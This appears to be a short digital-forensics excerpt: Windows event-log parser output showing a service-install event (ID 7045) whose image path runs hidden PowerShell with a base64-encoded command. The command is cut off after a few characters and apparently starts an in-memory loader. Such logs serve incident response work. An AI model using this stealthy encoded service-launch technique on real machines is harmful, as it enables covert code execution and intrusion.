parse_evtx.exe System.evtx | findstr /i "power" | more
Record #2396788 2027.02.22-08:03:00 'Computer':PC1',
'Channel':'System', 'EventSourceName':'Service Control Manager',
'Guid':‘GUID'Name':'Service Control Manager',
'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04,
'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the
system.), 'Qualifiers':16384, 'Keywords':8080000000000000,
'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692,
'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID,
'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min
powershell.exe -nop -w hidden -encodedcommand
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A
FMAdAByAGUAYQBtACgA